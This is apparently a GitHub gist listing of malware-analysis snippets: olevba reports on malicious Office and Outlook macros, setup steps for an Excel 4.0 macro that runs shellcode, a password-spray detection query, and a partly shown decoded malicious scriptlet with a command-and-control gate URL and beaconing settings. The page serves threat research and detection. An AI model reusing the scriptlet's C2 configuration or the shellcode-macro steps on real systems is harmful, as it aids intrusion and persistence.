@seclib
seclib / ca4f62279d6c7b7f8f7f37b97391f
Created November 20, 2019 13:16
Python exploit script found on VT
import subprocess
import re
import binascii
import socket
import struct
import threading
import os
import random
import platform
import decimal
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
@seclib
seclib / VbaProject.OTM
Created November 20, 2019 13:04
Malicious OTM file 7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 related to a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 - OLE stream: 'OutlookVbaData/VBA/ThisOutlookSession'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@seclib
seclib / shellcode.xlsm
Created November 20, 2019 13:00
XLM (Excel 4.0 macro) that executes shellcode inside 32-bit Excel - French macro code
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
debug = 0
def excepthook(exception_type, exception, traceback):
@seclib
seclib / attack.csl
Created August 7, 2019 01:51
Azure Sentinel Password spray query
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
@seclib
seclib / Scriptlet Decoded
Created March 5, 2019 09:59
Scriptlet Decoded
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
var BV = "6.0";
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
var hit_each = 1;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var Rkey = "ZkY3egXBulkogSbGEHqA";
var rcon_now = 0;
var gtfo = false;
var selfdel = false;
@seclib
seclib / e6f5r65t9n87r9u7yr87u
Created February 5, 2019 12:25
VBA DOC Malware MSBuild Scheduled Task
## Uploaded by satya_enki
## Sample evolution:
olevba3 0.53.1 - http://decalage.info/python/oletools
@seclib
seclib / adware
Last active January 4, 2019 18:47
It injects into Chrome, uses Google analytics for tracking, calls native Windows and COM APIs, and uses a scheduled task for persistence. Python sources and hashes
## uploaded by @satya_enki
## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
## links:
## https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
## https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
## Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
## https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/
## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):